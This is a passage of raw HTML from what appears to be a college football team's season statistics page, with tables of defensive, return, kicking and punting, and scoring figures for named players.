align="center" colspan=5 class="bold_text over_header" >Def Int</th> <th align="center" colspan=4 class="bold_text over_header" >Fumbles</th> </tr> <tr class=""> <th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th> <th align="left" class="tooltip sort_default_asc" >Player</th> <th align="right" class="tooltip" tip="Solo Tackles">Solo</th> <th align="right" class="tooltip" tip="Assisted Tackles">Ast</th> <th align="right" class="tooltip" tip="Total Tackles">Tot</th> <th align="right" class="tooltip" tip="Tackles for Loss">Loss</th> <th align="right" class="tooltip" tip="Sacks">Sk</th> <th align="right" class="tooltip" tip="Interceptions">Int</th> <th align="right" class="tooltip" tip="Interception Return Yards">Yds</th> <th align="right" class="tooltip" tip="Interception Return Yards Per Interception">Avg</th> <th align="right" class="tooltip" tip="Interception Return Touchdowns">TD</th> <th align="right" class="tooltip" tip="Passes Defended">PD</th> <th align="right" class="tooltip" tip="Fumbles Recovered">FR</th> <th align="right" class="tooltip" tip="Fumble Recovery Return Yards">Yds</th> <th align="right" class="tooltip" tip="Fumble Recovery Return Touchdowns">TD</th> <th align="right" class="tooltip" tip="Fumbles Forced">FF</th> </tr> </thead> <tbody> <tr class=""> <td align="right" csk="1">1</td> <td align="left" csk="Bishop,Desmond"><a href="/cfb/players/desmond-bishop-1.html">Desmond Bishop</a></td> <td align="right" >65</td> <td align="right" >61</td> <td align="right" >126</td> <td align="right" >15.0</td> <td align="right" >3.0</td> <td align="right" >3</td> <td align="right" >79</td> <td align="right" >26.3</td> <td align="right" >0</td> <td align="right" >5</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >2</td> </tr> <tr class=""> <td align="right" csk="2">2</td> <td align="left" csk="Hughes,Daymeion"><a href="/cfb/players/daymeion-hughes-1.html">Daymeion Hughes</a></td> <td align="right" >37</td> <td align="right" >35</td> <td align="right" >72</td> <td align="right" >1.0</td> <td align="right" >0.0</td> <td align="right" >8</td> <td align="right" >113</td> <td align="right" >14.1</td> <td align="right" >2</td> <td align="right" >19</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="3">3</td> <td align="left" csk="Pimentel,Mickey"><a href="/cfb/players/mickey-pimentel-1.html">Mickey Pimentel</a></td> <td align="right" >29</td> <td align="right" >35</td> <td align="right" >64</td> <td align="right" >10.0</td> <td align="right" >4.5</td> <td align="right" >1</td> <td align="right" >20</td> <td align="right" >20.0</td> <td align="right" >1</td> <td align="right" >6</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="4">4</td> <td align="left" csk="Hampton,Brandon"><a href="/cfb/players/brandon-hampton-1.html">Brandon Hampton</a></td> <td align="right" >34</td> <td align="right" >29</td> <td align="right" >63</td> <td align="right" >2.0</td> <td align="right" >1.0</td> <td align="right" >2</td> <td align="right" >38</td> <td align="right" >19.0</td> <td align="right" >0</td> <td align="right" >6</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="5">5</td> <td align="left" csk="Follett,Zack"><a href="/cfb/players/zack-follett-1.html">Zack Follett</a></td> <td align="right" >33</td> <td align="right" >28</td> <td align="right" >61</td> <td align="right" >11.5</td> <td align="right" >4.5</td> <td align="right" >1</td> <td align="right" >0</td> <td align="right" >0.0</td> <td align="right" >0</td> <td align="right" >3</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >4</td> </tr> <tr class=""> <td align="right" csk="6">6</td> <td align="left" csk="Thompson,Syd'Quan"><a href="/cfb/players/sydquan-thompson-1.html">Syd'Quan Thompson</a></td> <td align="right" >35</td> <td align="right" >25</td> <td align="right" >60</td> <td align="right" >2.5</td> <td align="right" >0.0</td> <td align="right" >1</td> <td align="right" >0</td> <td align="right" >0.0</td> <td align="right" >0</td> <td align="right" >3</td> <td align="right" >2</td> <td align="right" >18</td> <td align="right" >1</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="7">7</td> <td align="left" csk="Hicks,Bernard"><a href="/cfb/players/bernard-hicks-1.html">Bernard Hicks</a></td> <td align="right" >37</td> <td align="right" >21</td> <td align="right" >58</td> <td align="right" >1.5</td> <td align="right" >0.0</td> <td align="right" >2</td> <td align="right" >36</td> <td align="right" >18.0</td> <td align="right" >0</td> <td align="right" >8</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="8">8</td> <td align="left" csk="Mebane,Brandon"><a href="/cfb/players/brandon-mebane-1.html">Brandon Mebane</a></td> <td align="right" >23</td> <td align="right" >29</td> <td align="right" >52</td> <td align="right" >10.0</td> <td align="right" >4.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> </tr> <tr class=""> <td align="right" csk="9">9</td> <td align="left" csk="Williams,Worrell"><a href="/cfb/players/worrell-williams-1.html">Worrell Williams</a></td> <td align="right" >23</td> <td align="right" >28</td> <td align="right" >51</td> <td align="right" >2.0</td> <td align="right" >0.0</td> <td align="right" >1</td> <td align="right" >-3</td> <td align="right" >-3.0</td> <td align="right" >0</td> <td align="right" >2</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> </tr> <tr class=""> <td align="right" csk="10">10</td> <td align="left" csk="Decoud,Thomas"><a href="/cfb/players/thomas-decoud-1.html">Thomas Decoud</a></td> <td align="right" >26</td> <td align="right" >19</td> <td align="right" >45</td> <td align="right" >1.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >3</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="11">11</td> <td align="left" csk="Tafisi,Nu'U"><a href="/cfb/players/nuu-tafisi-1.html">Nu'U Tafisi</a></td> <td align="right" >12</td> <td align="right" >20</td> <td align="right" >32</td> <td align="right" >6.0</td> <td align="right" >5.5</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> </tr> <tr class=""> <td align="right" csk="12">12</td> <td align="left" csk="Van Hoesen,Greg"><a href="/cfb/players/greg-van-hoesen-1.html">Greg Van Hoesen</a></td> <td align="right" >12</td> <td align="right" >12</td> <td align="right" >24</td> <td align="right" >1.5</td> <td align="right" >1.5</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="13">13</td> <td align="left" csk="Ma'Afala,Abu"><a href="/cfb/players/abu-maafala-2.html">Abu Ma'Afala</a></td> <td align="right" >7</td> <td align="right" >16</td> <td align="right" >23</td> <td align="right" >3.0</td> <td align="right" >1.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="14">14</td> <td align="left" csk="Moye,Justin"><a href="/cfb/players/justin-moye-1.html">Justin Moye</a></td> <td align="right" >10</td> <td align="right" >13</td> <td align="right" >23</td> <td align="right" >0.5</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="15">15</td> <td align="left" csk="Felder,Anthony"><a href="/cfb/players/anthony-felder-1.html">Anthony Felder</a></td> <td align="right" >6</td> <td align="right" >12</td> <td align="right" >18</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="16">16</td> <td align="left" csk="Alualu,Tyson"><a href="/cfb/players/tyson-alualu-1.html">Tyson Alualu</a></td> <td align="right" >6</td> <td align="right" >10</td> <td align="right" >16</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="17">17</td> <td align="left" csk="Ezeff,Marcus"><a href="/cfb/players/marcus-ezeff-1.html">Marcus Ezeff</a></td> <td align="right" >7</td> <td align="right" >5</td> <td align="right" >12</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="18">18</td> <td align="left" csk="Peele,Robert"><a href="/cfb/players/robert-peele-1.html">Robert Peele</a></td> <td align="right" >6</td> <td align="right" >5</td> <td align="right" >11</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" >1</td> <td align="right" >13</td> <td align="right" >13.0</td> <td align="right" >0</td> <td align="right" >2</td> <td align="right" >1</td> <td align="right" >16</td> <td align="right" >0</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="19">19</td> <td align="left" csk="Malele,Matt"><a href="/cfb/players/matt-malele-1.html">Matt Malele</a></td> <td align="right" >4</td> <td align="right" >7</td> <td align="right" >11</td> <td align="right" >0.5</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="20">20</td> <td align="left" csk="Ta'Ufo'Ou,Will"><a href="/cfb/players/will-taufoou-1.html">Will Ta'Ufo'Ou</a></td> <td align="right" >2</td> <td align="right" >7</td> <td align="right" >9</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="21">21</td> <td align="left" csk="Bundy,Randy"><a href="/cfb/players/randy-bundy-1.html">Randy Bundy</a></td> <td align="right" >7</td> <td align="right" >1</td> <td align="right" >8</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="22">22</td> <td align="left" csk="Kelly,Steve"><a href="/cfb/players/steve-kelly-1.html">Steve Kelly</a></td> <td align="right" >3</td> <td align="right" >3</td> <td align="right" >6</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >2</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="23">23</td> <td align="left" csk="Kirst,Kyle"><a href="/cfb/players/kyle-kirst-1.html">Kyle Kirst</a></td> <td align="right" >3</td> <td align="right" >3</td> <td align="right" >6</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="24">24</td> <td align="left" csk="O'Keith,Marcus"><a href="/cfb/players/marcus-okeith-1.html">Marcus O'Keith</a></td> <td align="right" >2</td> <td align="right" >4</td> <td align="right" >6</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="25">25</td> <td align="left" csk="Storer,Byron"><a href="/cfb/players/byron-storer-1.html">Byron Storer</a></td> <td align="right" >4</td> <td align="right" >2</td> <td align="right" >6</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="26">26</td> <td align="left" csk="Davis,Rulon"><a href="/cfb/players/rulon-davis-1.html">Rulon Davis</a></td> <td align="right" >1</td> <td align="right" >4</td> <td align="right" >5</td> <td align="right" >0.5</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="27">27</td> <td align="left" csk="Hill,Derrick"><a href="/cfb/players/derrick-hill-1.html">Derrick Hill</a></td> <td align="right" >2</td> <td align="right" >3</td> <td align="right" >5</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="28">28</td> <td align="left" csk="Jones,Cody"><a href="/cfb/players/cody-jones-1.html">Cody Jones</a></td> <td align="right" >1</td> <td align="right" >4</td> <td align="right" >5</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="29">29</td> <td align="left" csk="Purtz,Chris"><a href="/cfb/players/chris-purtz-1.html">Chris Purtz</a></td> <td align="right" >4</td> <td align="right" >1</td> <td align="right" >5</td> <td align="right" >1.0</td> <td align="right" >1.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="30">30</td> <td align="left" csk="Russi,Matt"><a href="/cfb/players/matt-russi-1.html">Matt Russi</a></td> <td align="right" >3</td> <td align="right" >2</td> <td align="right" >5</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="31">31</td> <td align="left" csk="Brooks,Jesse"><a href="/cfb/players/jesse-brooks-1.html">Jesse Brooks</a></td> <td align="right" >3</td> <td align="right" >1</td> <td align="right" >4</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="32">32</td> <td align="left" csk="Johnson,Brett"><a href="/cfb/players/brett-johnson-1.html">Brett Johnson</a></td> <td align="right" >2</td> <td align="right" >2</td> <td align="right" >4</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="33">33</td> <td align="left" csk="Kane,Mika"><a href="/cfb/players/mika-kane-1.html">Mika Kane</a></td> <td align="right" >1</td> <td align="right" >3</td> <td align="right" >4</td> <td align="right" >0.5</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="34">34</td> <td align="left" csk="Forsett,Justin"><a href="/cfb/players/justin-forsett-1.html">Justin Forsett</a></td> <td align="right" >2</td> <td align="right" >1</td> <td align="right" >3</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="35">35</td> <td align="left" csk="Larson,Andrew"><a href="/cfb/players/andrew-larson-1.html">Andrew Larson</a></td> <td align="right" >2</td> <td align="right" >1</td> <td align="right" >3</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="36">36</td> <td align="left" csk="Sundberg,Nick"><a href="/cfb/players/nick-sundberg-1.html">Nick Sundberg</a></td> <td align="right" >2</td> <td align="right" >1</td> <td align="right" >3</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="37">37</td> <td align="left" csk="Lynch,Marshawn"><a href="/cfb/players/marshawn-lynch-1.html">Marshawn Lynch</a></td> <td align="right" >2</td> <td align="right" >0</td> <td align="right" >2</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="38">38</td> <td align="left" csk="Arthur,Julian"><a href="/cfb/players/julian-arthur-1.html">Julian Arthur</a></td> <td align="right" >1</td> <td align="right" >0</td> <td align="right" >1</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="39">39</td> <td align="left" csk="Jackson,Desean"><a href="/cfb/players/desean-jackson-1.html">Desean Jackson</a></td> <td align="right" >1</td> <td align="right" >0</td> <td align="right" >1</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="40">40</td> <td align="left" csk="Malele,Noris"><a href="/cfb/players/noris-malele-1.html">Noris Malele</a></td> <td align="right" >1</td> <td align="right" >0</td> <td align="right" >1</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="41">41</td> <td align="left" csk="McIntyre,Shea"><a href="/cfb/players/shea-mcintyre-1.html">Shea McIntyre</a></td> <td align="right" >0</td> <td align="right" >1</td> <td align="right" >1</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="42">42</td> <td align="left" csk="Morrah,Eric"><a href="/cfb/players/eric-morrah-1.html">Eric Morrah</a></td> <td align="right" >1</td> <td align="right" >0</td> <td align="right" >1</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="43">43</td> <td align="left" csk="Stevens,Craig"><a href="/cfb/players/craig-stevens-1.html">Craig Stevens</a></td> <td align="right" >1</td> <td align="right" >0</td> <td align="right" >1</td> <td align="right" >0.0</td> <td align="right" >0.0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="44">44</td> <td align="left" csk="Young,Eddie"><a href="/cfb/players/eddie-young-1.html">Eddie Young</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" >34</td> <td align="right" >34.0</td> <td align="right" >0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> </tbody> </table> </div> <div class="table_heading"> <h2 style="">Kick &amp; Punt Returns</h2> <div class="table_heading_text"></div> </div> <div class="table_container" id="div_returns"> <table class="sortable stats_table" id="returns"> <colgroup><col><col><col><col><col><col><col><col><col><col></colgroup> <thead> <tr class=" over_header"> <th align="CENTER" colspan=2 class="tooltip over_header" ></th> <th align="center" colspan=4 class="bold_text over_header" >Kick Ret</th> <th align="center" colspan=4 class="bold_text over_header" >Punt Ret</th> </tr> <tr class=""> <th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th> <th align="left" class="tooltip sort_default_asc" >Player</th> <th align="right" class="tooltip" tip="Kickoff Returns">Ret</th> <th align="right" class="tooltip" tip="Kickoff Return Yards">Yds</th> <th align="right" class="tooltip" tip="Kickoff Return Yards Per Return">Avg</th> <th align="right" class="tooltip" tip="Kickoff Return Touchdowns">TD</th> <th align="right" class="tooltip" tip="Punt Returns">Ret</th> <th align="right" class="tooltip" tip="Punt Return Yards">Yds</th> <th align="right" class="tooltip" tip="Punt Return Yards Per Return">Avg</th> <th align="right" class="tooltip" tip="Punt Return Touchdowns">TD</th> </tr> </thead> <tbody> <tr class=""> <td align="right" csk="1">1</td> <td align="left" csk="O'Keith,Marcus"><a href="/cfb/players/marcus-okeith-1.html">Marcus O'Keith</a></td> <td align="right" >12</td> <td align="right" >293</td> <td align="right" >24.4</td> <td align="right" >0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="2">2</td> <td align="left" csk="Lynch,Marshawn"><a href="/cfb/players/marshawn-lynch-1.html">Marshawn Lynch</a></td> <td align="right" >5</td> <td align="right" >101</td> <td align="right" >20.2</td> <td align="right" >0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="3">3</td> <td align="left" csk="Forsett,Justin"><a href="/cfb/players/justin-forsett-1.html">Justin Forsett</a></td> <td align="right" >5</td> <td align="right" >81</td> <td align="right" >16.2</td> <td align="right" >0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="4">4</td> <td align="left" csk="Jackson,Desean"><a href="/cfb/players/desean-jackson-1.html">Desean Jackson</a></td> <td align="right" >2</td> <td align="right" >38</td> <td align="right" >19.0</td> <td align="right" >0</td> <td align="right" >25</td> <td align="right" >455</td> <td align="right" >18.2</td> <td align="right" >4</td> </tr> <tr class=""> <td align="right" csk="5">5</td> <td align="left" csk="Russi,Matt"><a href="/cfb/players/matt-russi-1.html">Matt Russi</a></td> <td align="right" >2</td> <td align="right" >38</td> <td align="right" >19.0</td> <td align="right" >0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="6">6</td> <td align="left" csk="Hughes,Daymeion"><a href="/cfb/players/daymeion-hughes-1.html">Daymeion Hughes</a></td> <td align="right" >1</td> <td align="right" >21</td> <td align="right" >21.0</td> <td align="right" >0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="7">7</td> <td align="left" csk="Kirst,Kyle"><a href="/cfb/players/kyle-kirst-1.html">Kyle Kirst</a></td> <td align="right" >1</td> <td align="right" >12</td> <td align="right" >12.0</td> <td align="right" >0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="8">8</td> <td align="left" csk="Storer,Byron"><a href="/cfb/players/byron-storer-1.html">Byron Storer</a></td> <td align="right" >1</td> <td align="right" >11</td> <td align="right" >11.0</td> <td align="right" >0</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="9">9</td> <td align="left" csk="Tafisi,Nu'U"><a href="/cfb/players/nuu-tafisi-1.html">Nu'U Tafisi</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" >11</td> <td align="right" >11.0</td> <td align="right" >0</td> </tr> <tr class=""> <td align="right" csk="10">10</td> <td align="left" csk="Hampton,Brandon"><a href="/cfb/players/brandon-hampton-1.html">Brandon Hampton</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >1</td> <td align="right" >0</td> <td align="right" >0.0</td> <td align="right" >0</td> </tr> </tbody> </table> </div> <div class="table_heading"> <h2 style="">Kicking &amp; Punting</h2> <div class="table_heading_text"></div> </div> <div class="table_container" id="div_kicking_and_punting"> <table class="sortable stats_table" id="kicking_and_punting"> <colgroup><col><col><col><col><col><col><col><col><col><col><col><col></colgroup> <thead> <tr class=" over_header"> <th align="CENTER" colspan=2 class="tooltip over_header" ></th> <th align="center" colspan=7 class="bold_text over_header" >Kicking</th> <th align="center" colspan=3 class="bold_text over_header" >Punting</th> </tr> <tr class=""> <th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th> <th align="left" class="tooltip sort_default_asc" >Player</th> <th align="right" class="tooltip" tip="Extra Points Made">XPM</th> <th align="right" class="tooltip" tip="Extra Point Attempts">XPA</th> <th align="right" class="tooltip" tip="Extra Point Percentage">XP%</th> <th align="right" class="tooltip" tip="Field Goals Made">FGM</th> <th align="right" class="tooltip" tip="Field Goal Attempts">FGA</th> <th align="right" class="tooltip" tip="Field Goal Percentage">FG%</th> <th align="right" class="tooltip" tip="Points Kicking">Pts</th> <th align="right" class="tooltip" tip="Punts">Punts</th> <th align="right" class="tooltip" tip="Punting Yards">Yds</th> <th align="right" class="tooltip" tip="Punting Yards Per Punt">Avg</th> </tr> </thead> <tbody> <tr class=""> <td align="right" csk="1">1</td> <td align="left" csk="Schneider,Tom"><a href="/cfb/players/tom-schneider-1.html">Tom Schneider</a></td> <td align="right" >52</td> <td align="right" >52</td> <td align="right" >100.0</td> <td align="right" >15</td> <td align="right" >20</td> <td align="right" >75.0</td> <td align="right" >97</td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> </tr> <tr class=""> <td align="right" csk="2">2</td> <td align="left" csk="Larson,Andrew"><a href="/cfb/players/andrew-larson-1.html">Andrew Larson</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >49</td> <td align="right" >2087</td> <td align="right" >42.6</td> </tr> </tbody> </table> </div> <div class="table_heading"> <h2 style="">Scoring</h2> <div class="table_heading_text"></div> </div> <div class="table_container" id="div_scoring"> <table class="sortable stats_table" id="scoring"> <colgroup><col><col><col><col><col><col><col><col><col><col><col><col><col><col><col></colgroup> <thead> <tr class=" over_header"> <th align="CENTER" colspan=2 class="tooltip over_header" ></th> <th align="center" colspan=8 class="bold_text over_header" >Touchdowns</th> <th align="center" colspan=2 class="bold_text over_header" >Kicking</th> <th align="CENTER" colspan=2 class="tooltip over_header" ></th> <th></th> </tr> <tr class=""> <th align="right" class="ranker sort_default_asc" tip="Rank">Rk</th> <th align="left" class="tooltip sort_default_asc" >Player</th> <th align="right" class="tooltip" tip="Rushing Touchdowns">Rush</th> <th align="right" class="tooltip" tip="Receiving Touchdowns">Rec</th> <th align="right" class="tooltip" tip="Interception Return Touchdowns">Int</th> <th align="right" class="tooltip" tip="Fumble Recovery Return Touchdowns">FR</th> <th align="right" class="tooltip" tip="Punt Return Touchdowns">PR</th> <th align="right" class="tooltip" tip="Kick Return Touchdowns">KR</th> <th align="right" class="tooltip" tip="Other Touchdowns">Oth</th> <th align="right" class="tooltip" tip="Total Touchdowns">Tot</th> <th align="right" class="tooltip" tip="Extra Points Made">XPM</th> <th align="right" class="tooltip" tip="Field Goals Made">FGM</th> <th align="right" class="tooltip" tip="Two-Point Conversions Made">2PM</th> <th align="right" class="tooltip" tip="Safeties">Sfty</th> <th align="right" class="tooltip" tip="Points">Pts</th> </tr> </thead> <tbody> <tr class=""> <td align="right" csk="1">1</td> <td align="left" csk="Schneider,Tom"><a href="/cfb/players/tom-schneider-1.html">Tom Schneider</a></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" ></td> <td align="right" >52</td> <td align="right" >15</td> <td align="right" ></td> <td align="right" ></td> <td align="right" >97</td> </tr> <tr class=""> <td align="right" csk="2">2</td> <td align="left" csk="Lynch,Marshawn"><a 